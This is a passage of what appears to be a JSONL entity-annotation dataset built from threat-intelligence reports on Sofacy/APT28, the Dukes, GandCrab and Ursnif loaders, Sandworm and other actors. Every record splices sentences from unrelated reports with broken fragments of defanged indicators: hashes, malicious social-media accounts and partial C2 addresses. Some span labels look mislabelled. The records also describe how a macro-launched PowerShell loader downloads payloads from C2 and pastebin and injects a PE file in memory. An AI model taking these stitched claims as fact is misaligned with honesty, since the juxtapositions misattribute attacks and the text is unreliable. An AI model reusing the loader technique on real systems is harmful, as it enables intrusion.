Their evolving and modified SPLM , CHOPSTICK , XAgent code is a long-standing part of Sofacy activity , however much of it is changing . In this campaign the attackers used a MS Word document ( .doc format ) to deliver the initial stages . None Use of open source libraries for protocol implementation : The availability of open source projects that implement OT protocols can lower the barrier of entry for actors attempting to interact with OT devices .", "spans": [{"start": 41, "end": 45, "label": "System"}, {"start": 48, "end": 57, "label": "System"}, {"start": 60, "end": 66, "label": "System"}, {"start": 188, "end": 195, "label": "System"}, {"start": 207, "end": 211, "label": "Indicator"}, {"start": 265, "end": 314, "label": "System"}, {"start": 337, "end": 385, "label": "System"}]} {"text": "] com hxxp : //www [ . FireEye has moderate confidence that a campaign targeting the hospitality sector is attributed to Russian actor APT28 . It should be noted that out of the roughly 180 Word variants that were located by Carbon Black , the biggest difference in the documents was the metadata and junk data located in the malicious macros . However , we note that the wiper deployment was limited to the victim \u2019s IT environment and did not impact the hypervisor or the SCADA virtual machine .", "spans": [{"start": 6, "end": 22, "label": "Indicator"}, {"start": 23, "end": 30, "label": "Organization"}, {"start": 85, "end": 103, "label": "Organization"}, {"start": 129, "end": 140, "label": "Organization"}, {"start": 190, "end": 194, "label": "System"}, {"start": 225, "end": 237, "label": "Organization"}, {"start": 474, "end": 495, "label": "System"}]} {"text": "] 923525 [ . APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . 
However , the metadata clearly showed that the documents prepared for this campaign were initially saved on December 17 , 2018 and have continued to be updated through January 21 , 2019 . This type of vulnerability is known as a server-side request forgery ( SSRF ) .", "spans": [{"start": 13, "end": 18, "label": "Organization"}, {"start": 59, "end": 78, "label": "Vulnerability"}, {"start": 87, "end": 103, "label": "System"}, {"start": 104, "end": 113, "label": "System"}, {"start": 408, "end": 444, "label": "Vulnerability"}]} {"text": "] com hxxp : //www [ . Upon gaining access to the machines connected to corporate and guest Wi-Fi networks , APT28 deployed Responder . Several metadata fields ( specifically title , subject , author , comments , manager , and company ) appear to have been populated with different data sets . The most targeted organizations included those from technology and social media , NATO , and the transportation sector .", "spans": [{"start": 6, "end": 22, "label": "Indicator"}, {"start": 109, "end": 114, "label": "Organization"}, {"start": 124, "end": 133, "label": "System"}, {"start": 350, "end": 360, "label": "Organization"}, {"start": 365, "end": 377, "label": "Organization"}, {"start": 380, "end": 384, "label": "Organization"}, {"start": 395, "end": 416, "label": "Organization"}]} {"text": "] 923915 [ . Compared to other backdoor tools associated with the Sofacy group , the use of Zebrocy in attack campaigns is far more widespread . For example , the subject in all the samples was a combination of a US state and a common first name ( like Utah Erick or Tennessee Dayna ) . Most fraudsters create one-time email addresses or use stolen email addresses , both of which are easy to create or obtain .", "spans": [{"start": 31, "end": 45, "label": "System"}, {"start": 66, "end": 78, "label": "Organization"}, {"start": 92, "end": 99, "label": "System"}, {"start": 290, "end": 300, "label": "Organization"}]} {"text": "] com hxxp : //www [ . 
As alluded to in our previous blog regarding the Cannon tool , the Sofacy group ( AKA Fancy Bear , APT28 , STRONTIUM , Pawn Storm , Sednit ) has persistently attacked various government and private organizations around the world from mid-October 2018 through mid-November 2018 . For this post the following sample was analyzed . LockBit reportedly squeezed about $ 91 million out of US organizations with around 1,700 attacks since 2020 , according to a June report by CISA .", "spans": [{"start": 6, "end": 22, "label": "Indicator"}, {"start": 72, "end": 83, "label": "System"}, {"start": 90, "end": 102, "label": "Organization"}, {"start": 109, "end": 119, "label": "Organization"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 130, "end": 139, "label": "Organization"}, {"start": 142, "end": 152, "label": "Organization"}, {"start": 155, "end": 161, "label": "Organization"}, {"start": 198, "end": 208, "label": "Organization"}, {"start": 352, "end": 359, "label": "Organization"}, {"start": 406, "end": 422, "label": "Organization"}, {"start": 492, "end": 496, "label": "Organization"}]} {"text": "] 975685 [ . Russian citizens\u2014journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm . Richard_Johnson.doc : 878e4e8677e68aba918d930f2cc67fbe 0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080 . 
Based on the files \u2019 thumbnail images \u2013 the only content visible in the Windows Explorer window \u2013 the PowerPoint files imitate Ukraine \u2019s Ministry of Defence and Poland \u2019s Ministry of National Defence .", "spans": [{"start": 21, "end": 41, "label": "Organization"}, {"start": 44, "end": 63, "label": "Organization"}, {"start": 66, "end": 77, "label": "Organization"}, {"start": 80, "end": 107, "label": "Organization"}, {"start": 114, "end": 121, "label": "Organization"}, {"start": 143, "end": 153, "label": "Organization"}, {"start": 156, "end": 175, "label": "Indicator"}, {"start": 178, "end": 210, "label": "Indicator"}, {"start": 211, "end": 275, "label": "Indicator"}, {"start": 322, "end": 396, "label": "Indicator"}, {"start": 405, "end": 435, "label": "Organization"}, {"start": 440, "end": 478, "label": "Organization"}]} {"text": "] com Malicious Twitter accounts : https : //twitter.com/lucky88755 https : //twitter.com/lucky98745 https : //twitter.com/lucky876543 https : //twitter.com/luckyone1232 https : //twitter.com/sadwqewqeqw https : //twitter.com/gyugyu87418490 https : //twitter.com/fdgoer343 https : //twitter.com/sdfghuio342 https : //twitter.com/asdqweqweqeqw https : //twitter.com/ukenivor3 The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 . The document contained a VBS macro that once decompressed was approximately 650 lines of code . 
Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015 .", "spans": [{"start": 16, "end": 23, "label": "Organization"}, {"start": 35, "end": 67, "label": "Indicator"}, {"start": 68, "end": 100, "label": "Indicator"}, {"start": 101, "end": 134, "label": "Indicator"}, {"start": 135, "end": 169, "label": "Indicator"}, {"start": 170, "end": 203, "label": "Indicator"}, {"start": 204, "end": 240, "label": "Indicator"}, {"start": 241, "end": 272, "label": "Indicator"}, {"start": 273, "end": 306, "label": "Indicator"}, {"start": 307, "end": 342, "label": "Indicator"}, {"start": 343, "end": 374, "label": "Indicator"}, {"start": 379, "end": 387, "label": "System"}, {"start": 485, "end": 498, "label": "Vulnerability"}, {"start": 501, "end": 514, "label": "Vulnerability"}, {"start": 557, "end": 566, "label": "System"}, {"start": 628, "end": 635, "label": "Organization"}, {"start": 714, "end": 736, "label": "Organization"}, {"start": 748, "end": 756, "label": "Organization"}]} {"text": "Malicious Instagram account : https : //www.instagram.com/freedomguidepeople1830/ Malicious Tumblr accounts : https : //mainsheetgyam.tumblr.com/ https : //hormonaljgrj.tumblr.com/ https : //globalanab.tumblr.com/ C & C addresses : 104 [ . While the JHUHUGIT ( and more recently , \" JKEYSKW \" ) implant used in most of the Sofacy attacks , high profile victims are being targeted with another first level implant , representing the latest evolution of their AZZY Trojan . The vast majority of that was junk code . 
Two days after the OT event , Sandworm deployed a new variant of CADDYWIPER in the victim \u2019s IT environment to cause further disruption and potentially to remove forensic artifacts .", "spans": [{"start": 10, "end": 19, "label": "Organization"}, {"start": 30, "end": 81, "label": "Indicator"}, {"start": 92, "end": 98, "label": "Organization"}, {"start": 110, "end": 145, "label": "Indicator"}, {"start": 146, "end": 180, "label": "Indicator"}, {"start": 181, "end": 213, "label": "Indicator"}, {"start": 232, "end": 239, "label": "Indicator"}, {"start": 250, "end": 258, "label": "System"}, {"start": 283, "end": 290, "label": "System"}, {"start": 458, "end": 469, "label": "System"}, {"start": 544, "end": 552, "label": "Organization"}, {"start": 579, "end": 589, "label": "Malware"}, {"start": 597, "end": 621, "label": "System"}]} {"text": "] 160 [ . Once a foothold is established , Sofacy tries to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement . Once the junk code was removed from the VBScript , there are approximately 18 lines of relevant code , which ultimately call a shape box in the current document . This first step provides an SSRF equivalent to the technique used in ProxyNotShell exploitation .", "spans": [{"start": 43, "end": 49, "label": "Organization"}, {"start": 70, "end": 79, "label": "System"}, {"start": 82, "end": 94, "label": "System"}, {"start": 136, "end": 144, "label": "System"}, {"start": 210, "end": 218, "label": "System"}]} {"text": "] 191 [ . Once a foothold is established , they try to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement . The variable names themselves are not relevant , however the methods in bold below will retrieve the AlternativeText field from the specified shape , which is then executed . 
The operation targeted individuals from three groups Senior thinktank personnel researching the Middle East , journalists focused on the region , and academics , including senior professors .", "spans": [{"start": 67, "end": 76, "label": "System"}, {"start": 79, "end": 91, "label": "System"}, {"start": 133, "end": 141, "label": "System"}, {"start": 268, "end": 283, "label": "System"}, {"start": 342, "end": 355, "label": "Organization"}, {"start": 395, "end": 449, "label": "Organization"}, {"start": 452, "end": 485, "label": "Organization"}, {"start": 488, "end": 531, "label": "Organization"}]} {"text": "] 190:8822 61 [ . The Sofacy threat group continues to target government organizations in the EU , US , and former Soviet states to deliver the Zebrocy tool as a payload . The alternate text can easily be observed in the body of the office document . In each case , CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022 - 41040 for initial access .", "spans": [{"start": 11, "end": 17, "label": "Indicator"}, {"start": 22, "end": 41, "label": "Organization"}, {"start": 62, "end": 86, "label": "Organization"}, {"start": 144, "end": 156, "label": "System"}, {"start": 266, "end": 277, "label": "Organization"}, {"start": 361, "end": 377, "label": "Vulnerability"}]} {"text": "] 230 [ . Of note , we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon . The area highlighted in blue is the shape name that is being located , while the text itself is highlighted in red . If you can not apply the KB5019758 patch immediately , you should disable OWA until the patch can be applied .", "spans": [{"start": 43, "end": 55, "label": "Organization"}, {"start": 112, "end": 118, "label": "System"}, {"start": 126, "end": 132, "label": "System"}]} {"text": "] 204 [ . 
Komplex shares a significant amount of functionality and traits with another tool used by Sofacy \u2013 the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows . It is clear that the text is a base64 encoded command , that is then executed by the above VBScript . Mandiant has observed an increase in financially motivated operations by DPRK actors in the past year , particularly those focused on the cryptocurrency industry .", "spans": [{"start": 10, "end": 17, "label": "System"}, {"start": 100, "end": 106, "label": "Organization"}, {"start": 113, "end": 120, "label": "System"}, {"start": 134, "end": 140, "label": "Organization"}, {"start": 299, "end": 307, "label": "System"}, {"start": 383, "end": 394, "label": "Organization"}]} {"text": "] 87:28833 61 [ . The Sofacy group created the Komplex Trojan to use in attack campaigns targeting the OS X operating system \u2013 a move that showcases their continued evolution toward multi-platform attacks . The PowerShell script will first create an instance of the .Net Webclient class and then enumerate the available methods using the GetMethods() call ( highlighted in the image in red ) . Considering that both Royal and BlackSuit were active last month , however , a rebrand probably is n\u2019t happening any time soon .", "spans": [{"start": 11, "end": 17, "label": "Indicator"}, {"start": 22, "end": 34, "label": "Organization"}, {"start": 47, "end": 61, "label": "System"}, {"start": 211, "end": 221, "label": "System"}, {"start": 266, "end": 270, "label": "Indicator"}, {"start": 338, "end": 350, "label": "System"}, {"start": 416, "end": 421, "label": "Malware"}, {"start": 426, "end": 435, "label": "Malware"}]} {"text": "] 230 [ . The Komplex Trojan revealed a design similar to Sofacy 's Carberp variant Trojan , which we believe may have been done in order to handle compromised Windows and OS X systems using the same C2 server application with relative ease . 
The enumerated methods are stored , then a for loop looks first for the method named DownloadString ( highlighted in blue ) . NoEscape is a new ransomware which has been doing the rounds in underground forums since May 2023 .", "spans": [{"start": 14, "end": 28, "label": "System"}, {"start": 58, "end": 64, "label": "Organization"}, {"start": 68, "end": 75, "label": "System"}, {"start": 328, "end": 342, "label": "System"}, {"start": 369, "end": 377, "label": "Malware"}]} {"text": "] 204 [ . This whitepaper explores the tools ( such as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , etc. ) of the Dukes , a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . If the DownloadString method is located it will contact the hard-coded C2 requesting a file , which is downloaded and then invoked ( highlighted in blue ) . Another common delivery mechanism for ransomware attacks is via phishing emails , compounding the problem for security teams already overburdened with managing an ever-growing volume of suspicious messages that require review .", "spans": [{"start": 55, "end": 63, "label": "System"}, {"start": 66, "end": 76, "label": "System"}, {"start": 79, "end": 88, "label": "System"}, {"start": 91, "end": 99, "label": "System"}, {"start": 114, "end": 119, "label": "Organization"}, {"start": 172, "end": 192, "label": "Organization"}, {"start": 364, "end": 378, "label": "System"}, {"start": 428, "end": 430, "label": "System"}]} {"text": "] 87:28844 61 [ . The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . 
It should be noted that because the requested resource is being stored as a string and executed , this all occurs in memory . Check that there is more than 5 GB of disk space on the NetScaler device available ( instructions from vendor ) .", "spans": [{"start": 11, "end": 17, "label": "Indicator"}, {"start": 22, "end": 27, "label": "Organization"}, {"start": 82, "end": 102, "label": "Organization"}]} {"text": "] 230 [ . The Dukes are known to employ a vast arsenal of malware toolsets , which we identify as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , CloudDuke , SeaDuke , HammerDuke , PinchDuke , and GeminiDuke . Additional Analysis of the downloaded string is provided in the Gandcrab cradle section below . The \u201c -do \u201d flag specifies a SCIL program file to execute ( Figure 8) .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 98, "end": 106, "label": "System"}, {"start": 109, "end": 119, "label": "System"}, {"start": 122, "end": 131, "label": "System"}, {"start": 134, "end": 142, "label": "System"}, {"start": 145, "end": 154, "label": "System"}, {"start": 157, "end": 164, "label": "System"}, {"start": 167, "end": 177, "label": "System"}, {"start": 180, "end": 189, "label": "System"}, {"start": 196, "end": 206, "label": "System"}, {"start": 273, "end": 281, "label": "Malware"}, {"start": 305, "end": 362, "label": "Malware"}]} {"text": "] 204 [ . The origins of the Duke toolset names can be traced back to when researchers at Kaspersky Labs coined the term \" MiniDuke \" to identify the first Duke-related malware they found . The loop then looks for the method name DownloadData , and if located will download a resource from a second C2 . 
On July 15th , Facebook revealed it tracked and partially disrupted a long-running Iranian attack campaign that used accounts to pose as recruiters and draw in US targets before sending them malware-infected files or tricking them into entering sensitive credentials to phishing sites .", "spans": [{"start": 90, "end": 104, "label": "Organization"}, {"start": 123, "end": 131, "label": "System"}, {"start": 156, "end": 176, "label": "System"}, {"start": 230, "end": 242, "label": "System"}, {"start": 299, "end": 301, "label": "System"}, {"start": 319, "end": 327, "label": "Organization"}, {"start": 374, "end": 409, "label": "Organization"}]} {"text": "] 87:28855 61 [ . As researchers continued discovering new toolsets that were created and used by the same group that had been operating MiniDuke , the threat actor operating the toolsets came to be commonly referred to as \" Dukes \" . The downloaded resource is then stored in the CommonApplicationData directory ( C:\\ProgramData in Vista and later ) under the hard-coded file name ( highlighted in green ) . The use of 3AM was only partially successful .", "spans": [{"start": 11, "end": 17, "label": "Indicator"}, {"start": 107, "end": 112, "label": "Organization"}, {"start": 137, "end": 145, "label": "System"}, {"start": 161, "end": 173, "label": "Organization"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 418, "end": 421, "label": "Malware"}]} {"text": "] 230 [ . Based on the campaign identifiers found in PinchDuke samples discovered from 2009 , the targets of the Dukes group during that year included organizations such as the Ministry of Defense of Georgia and the ministries of foreign affairs of Turkey and Uganda . The script will utilize the hard-coded DCOM object C08AFD90-F2A1-11D1-8455-00A0C91F3880 , which is the ClassID for the ShellBrowserWindow . 
Although we have not identified sufficient evidence to determine the origin or purpose of COSMICENERGY , we believe that the malware was possibly developed by either Rostelecom - Solar or an associated party to recreate real attack scenarios against energy grid assets .", "spans": [{"start": 53, "end": 70, "label": "System"}, {"start": 113, "end": 124, "label": "Organization"}, {"start": 177, "end": 196, "label": "Organization"}, {"start": 216, "end": 245, "label": "Organization"}, {"start": 308, "end": 312, "label": "System"}, {"start": 388, "end": 406, "label": "System"}, {"start": 499, "end": 511, "label": "Malware"}]} {"text": "] 205 [ . Importantly , PinchDuke trojan samples always contain a notable text string , which we believe is used as a campaign identifier by the Dukes group to distinguish between multiple attack campaigns that are run in parallel . A previous blog post by enigma0x3 , detailed how this CLSID can be leveraged to instantiate the ShellBrowserWindow object and call the ShellExecute method , which is the same approach that was taken by the attackers . An adversary could potentially instruct a control systems device to perform an action that will cause an Impact", "spans": [{"start": 24, "end": 48, "label": "System"}, {"start": 145, "end": 156, "label": "Organization"}, {"start": 329, "end": 347, "label": "System"}, {"start": 368, "end": 380, "label": "System"}, {"start": 451, "end": 562, "label": "Vulnerability"}]} {"text": "] 122:28833 61 [ . This neatly ties together many of the tools used by the Dukes group , as versions of this one loader have been used to load malware from three different Dukes-related toolsets CosmicDuke , PinchDuke , and MiniDuke \u2013 over the course of five years . This approach has also been used in different Empire modules . 
The July 2023 campaign has a slightly modified infection chain .", "spans": [{"start": 12, "end": 18, "label": "Indicator"}, {"start": 75, "end": 86, "label": "Organization"}, {"start": 195, "end": 205, "label": "System"}, {"start": 208, "end": 217, "label": "System"}, {"start": 224, "end": 232, "label": "System"}, {"start": 313, "end": 319, "label": "System"}, {"start": 344, "end": 352, "label": "Organization"}]} {"text": "] 230 [ . The Dukes continued the expansion of their arsenal in 2011 with the addition of two more toolsets : MiniDuke and CozyDuke . The payloads that are downloaded in the above steps are then executed on the system . While a threat actor can choose only to access a single account from a single source IP address , Mandiant has observed that multiple accounts were accessed within hours from the same source IP address by a threat actor .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 110, "end": 118, "label": "System"}, {"start": 123, "end": 131, "label": "System"}, {"start": 345, "end": 439, "label": "Indicator"}]} {"text": "] 205 [ . As we now know , by February 2013 the Dukes group had been operating MiniDuke and other toolsets for at least 4 and a half years . The first payload that is downloaded via the DownloadString method highlighted above , is a PowerShell one-liner that uses an IF statement to evaluate the architecture of the compromised system , and then downloads a additional payload from pastebin.com . In the case of the exploit method described here as OWASSRF , the endpoint is not used , in lieu , and the request will not be dropped .", "spans": [{"start": 48, "end": 59, "label": "Organization"}, {"start": 79, "end": 87, "label": "System"}, {"start": 186, "end": 200, "label": "System"}, {"start": 233, "end": 243, "label": "System"}, {"start": 382, "end": 394, "label": "Indicator"}]} {"text": "] 122:28844 61 [ . 
Secondly , the value the Dukes intended to gain from these MiniDuke campaigns may have been so great that they deemed it worth the risk of getting noticed . This additional payload is then executed in memory . Cisco Secure Malware Analytics ( Threat Grid ) identifies malicious binaries and builds protection into all Cisco Secure products .", "spans": [{"start": 12, "end": 18, "label": "Indicator"}, {"start": 44, "end": 49, "label": "Organization"}, {"start": 229, "end": 259, "label": "System"}, {"start": 262, "end": 273, "label": "System"}]} {"text": "] 230 [ . This is in stark contrast to some other suspected Russian threat actors ( such as Operation Pawn Storm ) who appear to have increased their targeting of Ukraine following the crisis . The image below depicts the contents of the o402ek2m.php file . The Systemd configuration file leveraged by Sandworm enabled the group to maintain persistence on systems .", "spans": [{"start": 68, "end": 81, "label": "Organization"}, {"start": 238, "end": 250, "label": "Indicator"}, {"start": 302, "end": 310, "label": "Organization"}]} {"text": "] 205 [ . The Dukes actively targeted Ukraine before the crisis , at a time when Russia was still weighing her options , but once Russia moved from diplomacy to direct action , Ukraine was no longer relevant to the Dukes in the same way . It should be noted that the contents of o402ek2m.php were updated by the attackers to reference different pastebin uploads throughout this campaign . JumpCloud confirmed the commands framework was used for malicious data injections in their security incident disclosure .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 215, "end": 220, "label": "Organization"}, {"start": 279, "end": 291, "label": "Indicator"}]} {"text": "] 122:28855 61 [ . 
In the latter case however , the Dukes group appear to have also simultaneously developed an entirely new loader , which we first observed being used in conjunction with CosmicDuke during the spring of 2015 . Also updated was the function name that is invoked , in the example below it was CJOJFNUWNQKRTLLTMCVDCKFGG , however this was dynamically changed to match the name of the function that would be present in pastebin file that was being downloaded . Evidence of malicious intent can come in many forms , here are just a few potential IoAs", "spans": [{"start": 12, "end": 18, "label": "Indicator"}, {"start": 52, "end": 63, "label": "Organization"}, {"start": 189, "end": 199, "label": "System"}, {"start": 475, "end": 503, "label": "Indicator"}, {"start": 559, "end": 563, "label": "Indicator"}]} {"text": "] 230 [ . The Dukes could have ceased all use of CosmicDuke ( at least until they had developed a new loader ) or retired it entirely , since they still had other toolsets available . Once the raw contents of the pastebin.com post were downloaded , that data would also be executed in memory . \" Iran often adopts an asymmetric warfare strategy to accomplish its political and military goals , and its development of cyberwarfare capabilities adds to this asymmetric toolkit , allowing the country a lowcost means to conduct espionage and attack stronger adversaries .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 49, "end": 59, "label": "System"}, {"start": 213, "end": 225, "label": "Indicator"}, {"start": 296, "end": 300, "label": "Organization"}]} {"text": "] 205 [ . For these CozyDuke campaigns however , the Dukes appear to have employed two particular later-stage toolsets , SeaDuke and HammerDuke . In the variants that were obtained during this campaign the file contained a PowerShell script that was approximately 2800 lines . 
The popularity of social network and media platforms remain on the rise , and we expect cybercriminals to be naturally drawn towards exploiting them however they can .", "spans": [{"start": 53, "end": 58, "label": "Organization"}, {"start": 121, "end": 128, "label": "System"}, {"start": 133, "end": 143, "label": "System"}, {"start": 223, "end": 233, "label": "System"}, {"start": 295, "end": 329, "label": "System"}, {"start": 365, "end": 379, "label": "Organization"}]} {"text": "] 132:28833 61 [ . Firstly , as with the MiniDuke campaigns of February 2013 and CosmicDuke campaigns in the summer of 2014 , again the group clearly prioritized the continuation of their operations over maintaining stealth . This PowerShell script is a version of the Empire Invoke-PSInject module , with very few modifications . Figure 1 : URL vulnerable to CVE-2023 - 4966 https:///oauth / idp/.well - known / openid - configuration", "spans": [{"start": 12, "end": 18, "label": "Indicator"}, {"start": 136, "end": 141, "label": "Organization"}, {"start": 231, "end": 241, "label": "System"}, {"start": 269, "end": 291, "label": "System"}, {"start": 360, "end": 375, "label": "Vulnerability"}]} {"text": "] 230 [ . In addition to the notably overt and large-scale campaigns with CozyDuke and CloudDuke , the Dukes also continued to engage in more covert , surgical campaigns using CosmicDuke . The majority if the modifications are of removing comments and renaming variables . In fact , we saw instances of compromised stores having both skimmers loaded , which means double trouble for victims as their credit card information is stolen not just once but twice .", "spans": [{"start": 103, "end": 108, "label": "Organization"}, {"start": 176, "end": 186, "label": "System"}, {"start": 290, "end": 349, "label": "Indicator"}]} {"text": "] 205 [ . 
We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit . The script will take an embedded PE file that has been base64 encoded and inject that into the current PowerShell process . Mandiant identified UNC4899 targeting MacOS keychains and reconnaissance data associated with executives and internal security teams .", "spans": [{"start": 74, "end": 87, "label": "Vulnerability"}, {"start": 98, "end": 106, "label": "System"}, {"start": 160, "end": 168, "label": "Vulnerability"}, {"start": 190, "end": 195, "label": "Organization"}, {"start": 252, "end": 254, "label": "System"}, {"start": 322, "end": 332, "label": "System"}, {"start": 381, "end": 396, "label": "Organization"}, {"start": 401, "end": 475, "label": "Organization"}]} {"text": "] 132:28844 61 [ . All of the available evidence however does in our opinion suggest that the group operates on behalf of the Russian Federation . The image below is the main function that is being called which in turns calls the function responsible for injecting the embedded PE file . This rule was designed to match the decoded URI of any incoming request with the regex , so when the decoded URI matches this regex , the request is dropped .", "spans": [{"start": 12, "end": 18, "label": "Indicator"}, {"start": 94, "end": 99, "label": "Organization"}, {"start": 269, "end": 285, "label": "System"}]} {"text": "] 230 [ . This assertion of time zone is also supported by timestamps found in many GeminiDuke samples , which similarly suggest the group work in the Moscow Standard Time timezone , as further detailed in the section on the technical analysis of GeminiDuke . The base64 encoded PE file that can be seen in line 2760 of the image above is a GandCrab Variant . 
Charming Kitten members , claiming to be a senior teaching and research fellow at SOAS university in London sent targeted emails to a select number of victims from fewer than 10 organizations in the US and UK , inviting them to an online conference called The US Security Challenges in the Middle East .", "spans": [{"start": 84, "end": 102, "label": "System"}, {"start": 133, "end": 138, "label": "Organization"}, {"start": 247, "end": 257, "label": "System"}, {"start": 279, "end": 281, "label": "System"}, {"start": 341, "end": 349, "label": "Malware"}, {"start": 360, "end": 375, "label": "Organization"}]} {"text": "] 205 [ . Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years . This variant ( the metadata for which is listed below ) is Gandcrab version . Cisco , Microsoft , and other tech companies have joined in supporting Meta 's lawsuit against the NSO Group referenced above through court filings .", "spans": [{"start": 10, "end": 18, "label": "Organization"}, {"start": 53, "end": 62, "label": "Organization"}, {"start": 63, "end": 68, "label": "Organization"}, {"start": 242, "end": 250, "label": "Malware"}, {"start": 261, "end": 266, "label": "Organization"}, {"start": 269, "end": 278, "label": "Organization"}, {"start": 332, "end": 347, "label": "Organization"}, {"start": 360, "end": 369, "label": "Organization"}]} {"text": "] 132:28855 GoldenCup : New Cyber Threat Targeting World Cup Fans As the World Cup launches , so does a new threat Officials from the Israeli Defense Force recently uncovered an Android Spyware campaign targeting Israeli soldiers and orchestrated by \" Hamas . APT29 has used The Onion Router and the TOR domain fronting plugin meek to create a hidden , encrypted network tunnel that appeared to connect to Google services over TLS . 
krab5.dll : 0f270db9ab9361e20058b8c6129bf30e d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 , Mon Oct 29 17:39:23 2018 UTC . krab5.text : 019bc7edf8c2896754fdbdbc2ddae4ec . krab5.rdata : d6ed79624f7af19ba90f51379b7f31e4 . krab5.data : 1ec7b57b01d0c46b628a991555fc90f0 . krab5.rsrc : 89b7e19270b2a5563c301b84b28e423f . krab5.reloc : 685c3c775f65bffceccc1598ff7c2e59 . passing this wide string to function with only one string This could lead to unexpected behavior it could raise access violation exception or just continue and only the first placeholder replaced .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 134, "end": 155, "label": "Organization"}, {"start": 178, "end": 185, "label": "System"}, {"start": 252, "end": 257, "label": "Organization"}, {"start": 260, "end": 265, "label": "Organization"}, {"start": 275, "end": 291, "label": "System"}, {"start": 300, "end": 331, "label": "System"}, {"start": 406, "end": 412, "label": "Organization"}, {"start": 433, "end": 442, "label": "Indicator"}, {"start": 445, "end": 477, "label": "Indicator"}, {"start": 478, "end": 542, "label": "Indicator"}, {"start": 576, "end": 586, "label": "Indicator"}, {"start": 589, "end": 621, "label": "Indicator"}, {"start": 624, "end": 635, "label": "Indicator"}, {"start": 638, "end": 670, "label": "Indicator"}, {"start": 673, "end": 683, "label": "Indicator"}, {"start": 686, "end": 718, "label": "Indicator"}, {"start": 721, "end": 731, "label": "Indicator"}, {"start": 734, "end": 766, "label": "Indicator"}, {"start": 769, "end": 780, "label": "Indicator"}, {"start": 783, "end": 815, "label": "Indicator"}, {"start": 818, "end": 875, "label": "Malware"}]} {"text": "'' The latest samples attributed to this campaign were discovered by security researchers from ClearSky . Mandiant has observed APT29 using a stealthy backdoor that we call POSHSPY . The second payload , downloaded via the DownloadData method , is a Ursnif executable . 
Additional investigation will reveal more about the goals of Charming Kitten regarding the medical sector .", "spans": [{"start": 95, "end": 103, "label": "Organization"}, {"start": 106, "end": 114, "label": "Organization"}, {"start": 128, "end": 133, "label": "Organization"}, {"start": 173, "end": 180, "label": "System"}, {"start": 223, "end": 235, "label": "System"}, {"start": 250, "end": 256, "label": "Malware"}, {"start": 331, "end": 346, "label": "Organization"}, {"start": 361, "end": 375, "label": "Organization"}]} {"text": "In our research , we focus on the most recent sample , an application dubbed as \" Golden Cup '' , launched just before the start of World Cup 2018 . Mandiant has since identified POSHSPY in several other environments compromised by APT29 over the past two years . In this instance it is saved to the C:\\ProgramData directory with a pseudo random name . While one of his signatures uses his own blog domain , there is also a second signature which uses 93[.]gd , a domain that was found to have been actively selling VPS services in the past .", "spans": [{"start": 82, "end": 92, "label": "Malware"}, {"start": 149, "end": 157, "label": "Organization"}, {"start": 179, "end": 186, "label": "System"}, {"start": 232, "end": 237, "label": "Organization"}, {"start": 452, "end": 540, "label": "Indicator"}]} {"text": "Distribution / Infection When this campaign started at the start of 2018 , the malware ( \" GlanceLove '' , \" WinkChat '' ) was distributed by the perpetrators mainly via fake Facebook profiles , attempting to seduce IDF soldiers to socialize on a different platform ( their malware ) . In the investigations Mandiant has conducted , it appeared that APT29 deployed POSHSPY as a secondary backdoor for use if they lost access to their primary backdoors . It should be noted that the file name was changed throughout this campaign . 
The attacks reportedly use social engineering to create Trojan email campaigns customdesigned for their victims , the article stated .", "spans": [{"start": 91, "end": 101, "label": "Malware"}, {"start": 109, "end": 117, "label": "Malware"}, {"start": 175, "end": 183, "label": "System"}, {"start": 308, "end": 316, "label": "Organization"}, {"start": 350, "end": 355, "label": "Organization"}, {"start": 365, "end": 372, "label": "System"}]} {"text": "As this approach was not a great success , their last attempt was to quickly create a World Cup app and this time distribute it to Israeli citizens , not just soldiers . POSHSPY is an excellent example of the skill and craftiness of APT29 . Once executed the Ursnif sample will conduct the typical actions observed in Ursnif samples , like credential harvesting , gathering system and process information , and deploying additional malware samples . Other big stories in June include a suspected LockBit affiliate arrest , the Royal ransomware gang toying with a new encryptor , and a notable increase in attacks on the Manufacturing sector .", "spans": [{"start": 170, "end": 177, "label": "System"}, {"start": 233, "end": 238, "label": "Organization"}, {"start": 259, "end": 265, "label": "Malware"}, {"start": 318, "end": 324, "label": "Malware"}, {"start": 496, "end": 503, "label": "Organization"}, {"start": 527, "end": 548, "label": "Organization"}, {"start": 563, "end": 576, "label": "System"}, {"start": 620, "end": 640, "label": "Organization"}]} {"text": "The official \u201c Golden Cup \u201d Facebook page . FireEye assesses that APT32 leverages a unique suite of fully-featured malware , in conjunction with commercially-available tools , to conduct targeted operations that are aligned with Vietnamese state interests . The information for this specific sample is listed below . 
